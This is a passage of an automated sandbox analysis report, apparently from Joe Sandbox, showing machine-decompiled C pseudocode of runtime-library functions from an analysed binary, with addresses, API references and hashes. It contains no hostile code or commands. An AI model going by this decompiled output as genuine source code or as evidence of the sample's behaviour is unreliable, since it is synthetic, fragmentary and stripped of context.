				void* _t383;
				void* _t384;
				void* _t385;
				intOrPtr _t399;

				_t361 = __edx;
				_push(0xe0);
				E00425719(E0044FC3B, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t383 - 0xa4)) =  *((intOrPtr*)(_t383 + 8));
				_t370 = __ecx;
				 *((intOrPtr*)(_t383 - 0x90)) =  *((intOrPtr*)(_t383 + 0x18));
				 *(_t383 - 0x94) =  *(_t383 + 0x1c) & 0x0000ffff;
				 *((intOrPtr*)(_t383 - 4)) = 0;
				_t388 =  *((intOrPtr*)(_t383 + 0x14));
				if( *((intOrPtr*)(_t383 + 0x14)) == 0) {
					_push(E004013A0(_t383 - 0xac));
					 *((char*)(_t383 - 4)) = 2;
					_t202 = E0043EA75(0, __edx, __edi, __ecx, __eflags);
					_t364 = _t202;
					 *((intOrPtr*)(_t383 - 0x88)) = _t202;
					_t320 = _t383 - 0xac;
				} else {
					_push(E004013A0(_t383 - 0xa8));
					 *((char*)(_t383 - 4)) = 1;
					_t364 = E0043EB12(0, __edx, __edi, __ecx, _t388);
					 *((intOrPtr*)(_t383 - 0x88)) = _t364;
					_t320 = _t383 - 0xa8;
				}
				 *((char*)(_t383 - 4)) = 0;
				E004012D0();
				_t204 = E0043B943(_t320, 0x30, 0, _t370 + 8);
				_t372 = _t204 & 0x0000ffff;
				_t385 = _t384 + 0xc;
				 *(_t383 - 0x98) = _t204 & 0x0000ffff;
				E0043E9B7(_t364, _t383 - 0x48);
				 *((char*)(_t383 - 4)) = 3;
				_t208 =  *((intOrPtr*)( *_t364 + 0x1c))();
				asm("cdq");
				_t210 = (_t208 ^ _t361) - _t361;
				 *(_t383 - 0x8c) = _t210;
				if( *((intOrPtr*)(_t383 + 0x34)) > _t210) {
					__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
					_t211 =  *((intOrPtr*)(_t383 - 0x48));
					if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
						_t211 = _t383 - 0x48;
					}
					__eflags =  *_t211 - 0x7f;
					if( *_t211 != 0x7f) {
						__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
						_t299 =  *((intOrPtr*)(_t383 - 0x48));
						if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
							_t299 = _t383 - 0x48;
						}
						__eflags =  *_t299;
						if( *_t299 > 0) {
							_t301 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 8))();
							__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
							_t368 =  *((intOrPtr*)(_t383 - 0x48));
							_t316 = _t301 & 0x0000ffff;
							if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
								_t368 = _t383 - 0x48;
							}
							_t382 =  *((intOrPtr*)(_t383 + 0x34)) -  *(_t383 - 0x8c);
							while(1) {
								_t302 =  *_t368;
								__eflags = _t302 - 0x7f;
								if(_t302 == 0x7f) {
									goto L19;
								}
								__eflags = _t302;
								if(_t302 <= 0) {
									goto L19;
								}
								_t303 = _t302;
								__eflags = _t303 - _t382;
								if(_t303 >= _t382) {
									goto L19;
								}
								_t382 = _t382 - _t303;
								E0043F8EE(_t383 + 0x24, _t382, 1, _t316);
								_t305 = _t368 + 1;
								__eflags =  *_t305;
								if( *_t305 > 0) {
									_t368 = _t305;
								}
							}
						}
					}
					goto L19;
				} else {
					E0043F8EE(_t383 + 0x24, 0, _t210 -  *((intOrPtr*)(_t383 + 0x34)) + 1, _t372);
					L19:
					 *(_t383 - 0x1c) =  *(_t383 - 0x1c) & 0x00000000;
					_t365 = 7;
					 *((intOrPtr*)(_t383 - 0x18)) = _t365;
					 *((short*)(_t383 - 0x2c)) = 0;
					_t373 =  *((intOrPtr*)(_t383 - 0x88));
					_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88))));
					_push(_t383 - 0x84);
					 *((char*)(_t383 - 4)) = 4;
					if( *((char*)(_t383 + 0x20)) == 0) {
						 *((intOrPtr*)(_t213 + 0x20))();
						_t217 = E00449632(_t373, _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 6;
					} else {
						 *((intOrPtr*)(_t213 + 0x24))();
						_t217 = E0044964B(_t373, _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 5;
					}
					E0041B420(_t383 - 0x2c, _t217);
					E00418D50(_t383 - 0x80, 1, 0);
					 *(_t383 - 0x54) =  *(_t383 - 0x54) & 0x00000000;
					 *((intOrPtr*)(_t383 - 0x50)) = _t365;
					 *((short*)(_t383 - 0x64)) = 0;
					 *((char*)(_t383 - 4)) = 7;
					if(( *( *((intOrPtr*)(_t383 - 0x90)) + 0x14) & 0x00000008) != 0) {
						_t293 = E00449619( *((intOrPtr*)(_t383 - 0x88)), _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 8;
						E0041B420(_t383 - 0x64, _t293);
						 *((char*)(_t383 - 4)) = 7;
						E00418D50(_t383 - 0x80, 1, 0);
					}
					_t366 =  *(_t383 - 0x8c);
					_t314 = 0;
					_t362 = 0;
					_t328 = 0;
					do {
						_t224 =  *((char*)(_t383 + _t328 - 0x84)) - 0x20;
						if(_t224 == 0) {
							_t362 = _t362 + 1;
							__eflags = _t362;
							L38:
							__eflags = _t328 - 3;
							if(_t328 != 3) {
								_t314 = 1;
							}
							goto L40;
						}
						_t284 = _t224 - 4;
						if(_t284 == 0) {
							_t362 = _t362 +  *(_t383 - 0x54);
							goto L40;
						}
						_t285 = _t284 - 7;
						if(_t285 == 0) {
							_t362 = _t362 +  *(_t383 - 0x1c);
							goto L40;
						}
						_t286 = _t285 - 0x4b;
						if(_t286 == 0) {
							__eflags =  *((intOrPtr*)(_t383 + 0x34)) - _t366;
							if( *((intOrPtr*)(_t383 + 0x34)) > _t366) {
								_t287 = 0;
								__eflags = 0;
							} else {
								_t287 = _t366 -  *((intOrPtr*)(_t383 + 0x34)) + 1;
							}
							__eflags = 0 - _t366;
							asm("sbb esi, esi");
							_t362 = _t362 +  ~0x00000000 +  *((intOrPtr*)(_t383 + 0x34)) + _t287;
							goto L40;
						}
						if(_t286 == 0) {
							goto L38;
						}
						L40:
						_t328 = _t328 + 1;
					} while (_t328 < 4);
					_t329 =  *((intOrPtr*)(_t383 - 0x90));
					_t399 =  *((intOrPtr*)(_t329 + 0x24));
					_t225 =  *((intOrPtr*)(_t329 + 0x20));
					if(_t399 < 0 || _t399 <= 0 && _t225 == 0 || _t225 <= _t362) {
						_t374 = 0;
						__eflags = 0;
					} else {
						_t374 = _t225 - _t362;
					}
					_t228 =  *(_t329 + 0x14) & 0x000001c0;
					 *(_t383 - 0x8c) = _t228;
					if(_t228 != 0x40 && (_t228 != 0x100 || _t314 == 0)) {
						_t281 = E0043C5FA(_t383 - 0xa0,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
						 *((intOrPtr*)(_t383 + 0xc)) =  *_t281;
						_t385 = _t385 + 0x14;
						 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t281 + 4));
						_t374 = 0;
					}
					_t315 = 0;
					do {
						_t230 =  *((char*)(_t383 + _t315 - 0x84)) - 0x20;
						if(_t230 == 0) {
							 *((intOrPtr*)(_t383 - 0xa0)) =  *((intOrPtr*)(_t383 + 0xc));
							 *((intOrPtr*)(_t383 - 0x9c)) =  *((intOrPtr*)(_t383 + 0x10));
							E0043C582(_t383 - 0xa0,  *(_t383 - 0x94));
							 *((intOrPtr*)(_t383 + 0xc)) =  *((intOrPtr*)(_t383 - 0xa0));
							 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t383 - 0x9c));
							L81:
							__eflags =  *(_t383 - 0x8c) - 0x100;
							if( *(_t383 - 0x8c) != 0x100) {
								goto L84;
							}
							_t250 = E0043C5FA(_t383 - 0xb4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
							_t385 = _t385 + 0x14;
							_t374 = 0;
							__eflags = 0;
							L83:
							 *((intOrPtr*)(_t383 + 0xc)) =  *_t250;
							 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t250 + 4));
							goto L84;
						}
						_t252 = _t230 - 4;
						if(_t252 == 0) {
							__eflags =  *((intOrPtr*)(_t383 - 0x50)) - 8;
							_t253 =  *((intOrPtr*)(_t383 - 0x64));
							if( *((intOrPtr*)(_t383 - 0x50)) < 8) {
								_t253 = _t383 - 0x64;
							}
							_push( *(_t383 - 0x54));
							_push(_t253);
							_t254 = _t383 - 0xe4;
							L62:
							_push( *((intOrPtr*)(_t383 + 0x10)));
							_push( *((intOrPtr*)(_t383 + 0xc)));
							L63:
							_push(_t254);
							_t250 = E0043C77F();
							_t385 = _t385 + 0x14;
							goto L83;
						}
						_t255 = _t252 - 7;
						if(_t255 == 0) {
							__eflags =  *(_t383 - 0x1c);
							if( *(_t383 - 0x1c) <= 0) {
								goto L84;
							}
							__eflags =  *((intOrPtr*)(_t383 - 0x18)) - 8;
							_t256 =  *((intOrPtr*)(_t383 - 0x2c));
							if( *((intOrPtr*)(_t383 - 0x18)) < 8) {
								_t256 = _t383 - 0x2c;
							}
							_push(1);
							_push(_t256);
							_t254 = _t383 - 0xec;
							goto L62;
						}
						_t257 = _t255 - 0x4b;
						if(_t257 == 0) {
							__eflags = _t366;
							if(_t366 != 0) {
								__eflags =  *((intOrPtr*)(_t383 + 0x34)) - _t366;
								if( *((intOrPtr*)(_t383 + 0x34)) > _t366) {
									__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
									_t258 =  *((intOrPtr*)(_t383 + 0x24));
									if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
										_t258 = _t383 + 0x24;
									}
									_t260 = E0043C77F(_t383 - 0xcc,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)), _t258,  *((intOrPtr*)(_t383 + 0x34)) - _t366);
									 *((intOrPtr*)(_t383 + 0xc)) =  *_t260;
									 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t260 + 4));
									_t385 = _t385 + 0x14;
									E0043C582(_t383 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 4))() & 0x0000ffff);
									__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
									_t266 =  *((intOrPtr*)(_t383 + 0x24));
									if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
										_t266 = _t383 + 0x24;
									}
									_push(_t366);
									_push(_t266 + ( *((intOrPtr*)(_t383 + 0x34)) - _t366) * 2);
									_t254 = _t383 - 0xdc;
									goto L62;
								}
								E0043C582(_t383 + 0xc,  *(_t383 - 0x98));
								E0043C582(_t383 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 4))() & 0x0000ffff);
								_t276 = E0043C5FA(_t383 - 0xd4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x98), _t366 -  *((intOrPtr*)(_t383 + 0x34)));
								 *((intOrPtr*)(_t383 + 0xc)) =  *_t276;
								_t385 = _t385 + 0x14;
								__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
								 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t276 + 4));
								_t351 =  *((intOrPtr*)(_t383 + 0x24));
								if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
									_t351 = _t383 + 0x24;
								}
								_push( *((intOrPtr*)(_t383 + 0x34)));
								_push(_t351);
								_push( *((intOrPtr*)(_t276 + 4)));
								_push( *_t276);
								_t254 = _t383 - 0xc4;
								goto L63;
							}
							__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
							_t277 =  *((intOrPtr*)(_t383 + 0x24));
							if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
								_t277 = _t383 + 0x24;
							}
							_push( *((intOrPtr*)(_t383 + 0x34)));
							_push(_t277);
							_t254 = _t383 - 0xbc;
							goto L62;
						}
						if(_t257 == 0) {
							goto L81;
						}
						L84:
						_t315 = _t315 + 1;
					} while (_t315 < 4);
					if( *(_t383 - 0x1c) > 1) {
						_t244 =  *((intOrPtr*)(_t383 - 0x2c));
						if( *((intOrPtr*)(_t383 - 0x18)) < 8) {
							_t244 = _t383 - 0x2c;
						}
						_t247 = E0043C77F(_t383 - 0xb4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)), _t244 + 2,  *(_t383 - 0x1c) - 1);
						 *((intOrPtr*)(_t383 + 0xc)) =  *_t247;
						_t385 = _t385 + 0x14;
						 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t247 + 4));
					}
					_t236 =  *((intOrPtr*)(_t383 - 0x90));
					 *((intOrPtr*)(_t236 + 0x20)) = 0;
					 *((intOrPtr*)(_t236 + 0x24)) = 0;
					E0043C5FA( *((intOrPtr*)(_t383 - 0xa4)),  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
					E00418D50(_t383 - 0x64, 1, 0);
					E00418D50(_t383 - 0x2c, 1, 0);
					E00402E20(_t383 - 0x48, 1, 0);
					E00418D50(_t383 + 0x24, 1, 0);
					return E00425763(_t315, 0, 1);
				}
			}

0x00445dbf
0x00445dbf
0x00445dc9
0x00445dd1
0x00445ddb
0x00445de0
0x00445de6
0x00445dee
0x00445df1
0x00445df4
0x00445e29
0x00445e2a
0x00445e2e
0x00445e34
0x00445e36
0x00445e3c
0x00445df6
0x00445e02
0x00445e03
0x00445e0c
0x00445e0f
0x00445e15
0x00445e15
0x00445e42
0x00445e46
0x00445e52
0x00445e57
0x00445e5a
0x00445e63
0x00445e69
0x00445e72
0x00445e76
0x00445e79
0x00445e7c
0x00445e7e
0x00445e87
0x00445e9a
0x00445e9e
0x00445ea1
0x00445ea3
0x00445ea3
0x00445ea6
0x00445ea9
0x00445eab
0x00445eaf
0x00445eb2
0x00445eb4
0x00445eb4
0x00445eb7
0x00445eba
0x00445ec4
0x00445ec7
0x00445ecb
0x00445ece
0x00445ed1
0x00445ed3
0x00445ed3
0x00445ed9
0x00445f04
0x00445f04
0x00445f06
0x00445f08
0x00000000
0x00000000
0x00445ee1
0x00445ee3
0x00000000
0x00000000
0x00445ee5
0x00445ee8
0x00445eea
0x00000000
0x00000000
0x00445eed
0x00445ef5
0x00445efa
0x00445efd
0x00445f00
0x00445f02
0x00445f02
0x00445f00
0x00445f04
0x00445eba
0x00000000
0x00445e89
0x00445e93
0x00445f0a
0x00445f0a
0x00445f10
0x00445f13
0x00445f16
0x00445f1e
0x00445f24
0x00445f2c
0x00445f2d
0x00445f33
0x00445f55
0x00445f6a
0x00445f6f
0x00445f35
0x00445f35
0x00445f4a
0x00445f4f
0x00445f4f
0x00445f77
0x00445f83
0x00445f88
0x00445f8e
0x00445f91
0x00445f9e
0x00445fa4
0x00445fb0
0x00445fb9
0x00445fbd
0x00445fc9
0x00445fcd
0x00445fcd
0x00445fd2
0x00445fd8
0x00445fda
0x00445fdc
0x00445fde
0x00445fe6
0x00445fe9
0x0044602a
0x0044602a
0x0044602b
0x0044602b
0x0044602e
0x00446030
0x00446030
0x00000000
0x0044602e
0x00445feb
0x00445fee
0x00446025
0x00000000
0x00446025
0x00445ff0
0x00445ff3
0x00446020
0x00000000
0x00446020
0x00445ff5
0x00445ff8
0x00446000
0x00446003
0x0044600d
0x0044600d
0x00446005
0x0044600a
0x0044600a
0x00446011
0x00446013
0x0044601c
0x00000000
0x0044601c
0x00445ffc
0x00000000
0x00000000
0x00446032
0x00446032
0x00446033
0x00446038
0x0044603e
0x00446042
0x00446045
0x00446057
0x00446057
0x00446051
0x00446053
0x00446053
0x0044605e
0x00446063
0x0044606c
0x0044608d
0x00446094
0x0044609a
0x0044609d
0x004460a0
0x004460a0
0x004460a2
0x004460a4
0x004460ac
0x004460af
0x00446230
0x0044623f
0x00446245
0x00446250
0x00446259
0x0044625c
0x0044625c
0x00446266
0x00000000
0x00000000
0x0044627c
0x00446281
0x00446284
0x00446284
0x00446286
0x00446288
0x0044628e
0x00000000
0x0044628e
0x004460b5
0x004460b8
0x0044620c
0x00446210
0x00446213
0x00446215
0x00446215
0x00446218
0x0044621b
0x0044621c
0x004460f3
0x004460f3
0x004460f6
0x004460f9
0x004460f9
0x004460fa
0x004460ff
0x00000000
0x004460ff
0x004460be
0x004460c1
0x004461e8
0x004461ec
0x00000000
0x00000000
0x004461f2
0x004461f6
0x004461f9
0x004461fb
0x004461fb
0x004461fe
0x00446200
0x00446201
0x00000000
0x00446201
0x004460c7
0x004460ca
0x004460d9
0x004460db
0x00446107
0x0044610a
0x0044617d
0x00446181
0x00446184
0x00446186
0x00446186
0x0044619d
0x004461a4
0x004461b0
0x004461b5
0x004461c2
0x004461c7
0x004461cb
0x004461ce
0x004461d0
0x004461d0
0x004461db
0x004461dc
0x004461dd
0x00000000
0x004461dd
0x00446115
0x0044612c
0x0044614a
0x00446151
0x00446157
0x0044615a
0x0044615e
0x00446161
0x00446164
0x00446166
0x00446166
0x00446169
0x0044616c
0x0044616d
0x00446170
0x00446172
0x00000000
0x00446172
0x004460dd
0x004460e1
0x004460e4
0x004460e6
0x004460e6
0x004460e9
0x004460ec
0x004460ed
0x00000000
0x004460ed
0x004460ce
0x00000000
0x00000000
0x00446291
0x00446291
0x00446292
0x0044629f
0x004462a5
0x004462a8
0x004462aa
0x004462aa
0x004462c3
0x004462ca
0x004462d0
0x004462d3
0x004462d3
0x004462d6
0x004462e8
0x004462ee
0x004462f7
0x00446307
0x00446311
0x0044631b
0x00446325
0x00446335
0x00446335

APIs

__EH_prolog3_GS.LIBCMT ref: 00445DC9
_Maklocchr.LIBCPMT ref: 00445E52

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043EB12: __EH_prolog3.LIBCMT ref: 0043EB19
Part of subcall function 0043EB12: std::_Lockit::_Lockit.LIBCPMT ref: 0043EB23

Part of subcall function 0043F8EE: std::_Xinvalid_argument.LIBCPMT ref: 0043F907
Part of subcall function 0043F8EE: std::_Xinvalid_argument.LIBCPMT ref: 0043F91D
Part of subcall function 0043F8EE: _memmove.LIBCMT ref: 0043F965

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::_$LockitLockit::_Xinvalid_argument$H_prolog3H_prolog3_Maklocchr_memmove
String ID:
API String ID: 2257133000-0
Opcode ID: b606301a919e840a88e70edf1322ddff4159e0eb66f816fdfb6e2aa92415c60c
Instruction ID: 39e9e75978d6d25c212dad1368a672a5ad45844447d29e8646899b9fd52e5de8
Opcode Fuzzy Hash: b606301a919e840a88e70edf1322ddff4159e0eb66f816fdfb6e2aa92415c60c
Instruction Fuzzy Hash: E5025D71900218AFEF14DF68C944BEE7BB5BF09304F15809AF84AA7251DB389E45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042CF16 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CF16() {

				SetUnhandledExceptionFilter(E0042CED4);
				return 0;
			}

0x0042cf1b
0x0042cf23

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002CED4), ref: 0042CF1B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7d4df570e63d0032e02e2c408c61fc0399c66122343c50c3075be3c06fb561e7
Instruction ID: 510742f1edcf8b02c8c91342374a0206c563e02cad8b7ea6d540b187ed82629e
Opcode Fuzzy Hash: 7d4df570e63d0032e02e2c408c61fc0399c66122343c50c3075be3c06fb561e7
Instruction Fuzzy Hash: 629002607D16114A4A0417706C4E70965956E5C64779208A16111D4066DB5485005619

Uniqueness

Uniqueness Score: -1.00%

Function 0043943F Relevance: 1.4, Strings: 1, Instructions: 180
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 96%

			E0043943F(char* _a4, intOrPtr _a8, signed int _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				unsigned int* _t82;
				signed int _t83;
				unsigned int _t84;
				unsigned int _t88;
				signed int _t91;
				signed int _t93;
				unsigned int _t95;
				unsigned int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				unsigned int _t116;
				unsigned int _t117;
				unsigned int _t119;
				signed int _t121;
				signed int _t122;
				unsigned int _t125;
				unsigned int _t127;
				unsigned int _t129;
				unsigned int _t140;
				intOrPtr _t141;
				char _t144;
				void* _t145;
				signed int _t147;

				_t82 = _a12;
				_t83 = 0;
				_v8 = 0x404e;
				 *_t82 = 0;
				_t82[1] = 0;
				_t82[2] = 0;
				if(_a8 <= 0) {
					L27:
					if(_t82[2] != _t83) {
						L31:
						_t122 = _t82[2];
						if((_t122 & 0x00008000) != 0) {
							L34:
							_t82[2] = _v8;
							return _t82;
						}
						_t91 = _t82[1];
						do {
							_t84 =  *_t82;
							_v8 = _v8 + 0xffff;
							_t122 = _t122 + _t122 | _t91 >> 0x0000001f;
							_t91 = _t91 + _t91 | _t84 >> 0x0000001f;
							 *_t82 = _t84 + _t84;
							_t82[1] = _t91;
							_t82[2] = _t122;
						} while ((_t122 & 0x00008000) == 0);
						goto L34;
					}
					_t108 = _t82[1];
					do {
						_t93 =  *_t82;
						_v8 = _v8 + 0xfff0;
						_t125 = _t108 >> 0x10;
						_t108 = _t108 << 0x00000010 | _t93 >> 0x00000010;
						_t82[1] = _t108;
						 *_t82 = _t93 << 0x10;
					} while (_t125 == _t83);
					_t82[2] = _t125;
					goto L31;
				} else {
					_t95 = 0;
					_a12 = 0;
					do {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t127 = _t95 + _t95;
						_t97 = _t83 + _t83 | _t95 >> 0x0000001f;
						_a12 = _a12 & 0x00000000;
						_v12 = _t127;
						_t99 = _t97 + _t97 | _t127 >> 0x0000001f;
						_t129 = _t99;
						_v12 = _t99;
						_t140 = _v12 + _v12;
						_t101 = (_a12 + _a12 | _t83 >> 0x0000001f) + (_a12 + _a12 | _t83 >> 0x0000001f) | _t97 >> 0x0000001f;
						_t116 = _v28 + _t140;
						 *_t82 = _t140;
						_t82[1] = _t129;
						_t82[2] = _t101;
						if(_t116 < _t140 || _t116 < _v28) {
							_a12 = 1;
						}
						 *_t82 = _t116;
						if(_a12 != 0) {
							_t147 = _v12;
							_a12 = _a12 & 0x00000000;
							_t129 = _t147 + 1;
							if(_t129 < _t147 || _t129 < 1) {
								_a12 = 1;
							}
							_t82[1] = _t129;
							if(_a12 != 0) {
								_t101 = _t101 + 1;
								_t82[2] = _t101;
							}
						}
						_t141 = _v24;
						_a12 = _a12 & 0x00000000;
						_t88 = _t129 + _t141;
						if(_t88 < _t129 || _t88 < _t141) {
							_a12 = 1;
						}
						_t82[1] = _t88;
						if(_a12 != 0) {
							_t101 = _t101 + 1;
							_t82[2] = _t101;
						}
						_v12 = _v12 & 0x00000000;
						_t104 = _t101 + _v20 + _t101 + _v20 | _t88 >> 0x0000001f;
						_t117 = _t116 + _t116;
						_t83 = _t88 + _t88 | _t116 >> 0x0000001f;
						_t82[2] = _t104;
						_v16 = _t104;
						_a12 = _t104;
						 *_t82 = _t117;
						_t82[1] = _t83;
						_t144 =  *_a4;
						_t95 = _t117 + _t144;
						_v28 = _t144;
						if(_t95 < _t117 || _t95 < _t144) {
							_v12 = 1;
						}
						 *_t82 = _t95;
						if(_v12 != 0) {
							_t51 = _t83 + 1; // 0x1
							_t119 = _t51;
							_t145 = 0;
							if(_t119 < _t83 || _t119 < 1) {
								_t145 = 1;
							}
							_t83 = _t119;
							_t82[1] = _t119;
							if(_t145 != 0) {
								_t121 = _v16 + 1;
								_a12 = _t121;
								_t82[2] = _t121;
							}
						}
						_a8 = _a8 - 1;
						_a4 = _a4 + 1;
						_t82[1] = _t83;
						_t82[2] = _a12;
					} while (_a8 > 0);
					_t83 = 0;
					goto L27;
				}
			}

0x00439447
0x0043944b
0x0043944f
0x00439456
0x00439458
0x0043945b
0x00439461
0x004395ac
0x004395af
0x004395db
0x004395db
0x004395e4
0x00439616
0x0043961c
0x00439622
0x00439622
0x004395e6
0x004395e9
0x004395e9
0x004395eb
0x00439600
0x00439604
0x00439606
0x00439608
0x0043960b
0x0043960e
0x00000000
0x004395e9
0x004395b1
0x004395b4
0x004395b4
0x004395b6
0x004395c7
0x004395ca
0x004395cf
0x004395d2
0x004395d4
0x004395d8
0x00000000
0x00439467
0x00439467
0x00439469
0x0043946c
0x00439471
0x00439472
0x00439473
0x00439476
0x0043947f
0x00439484
0x0043948c
0x0043949e
0x004394a0
0x004394a2
0x004394ab
0x004394b0
0x004394b2
0x004394b4
0x004394b6
0x004394b9
0x004394be
0x004394c5
0x004394c5
0x004394d0
0x004394d2
0x004394d4
0x004394d7
0x004394db
0x004394e0
0x004394e7
0x004394e7
0x004394f2
0x004394f5
0x004394f7
0x004394f8
0x004394f8
0x004394f5
0x004394fb
0x004394fe
0x00439502
0x00439507
0x0043950d
0x0043950d
0x00439518
0x0043951b
0x0043951d
0x0043951e
0x0043951e
0x00439524
0x00439531
0x00439538
0x0043953a
0x0043953c
0x0043953f
0x00439542
0x00439548
0x0043954a
0x0043954d
0x00439550
0x00439553
0x00439558
0x0043955e
0x0043955e
0x00439569
0x0043956b
0x0043956d
0x0043956d
0x00439570
0x00439574
0x0043957d
0x0043957d
0x0043957e
0x00439580
0x00439585
0x0043958a
0x0043958b
0x0043958e
0x0043958e
0x00439585
0x00439591
0x00439597
0x0043959e
0x004395a1
0x004395a1
0x004395aa
0x00000000
0x004395aa

Strings

N@, xrefs: 0043944F

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: 642815427614ed6b97891de0641412b0ffc5bdb2c132cd11d59331f10bad50d7
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: 8C615A729003159FCB19CF48C48469ABBF2FF88310F1AC5AED8095B365C7B59D95CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004306F0 Relevance: .4, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004306F0(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
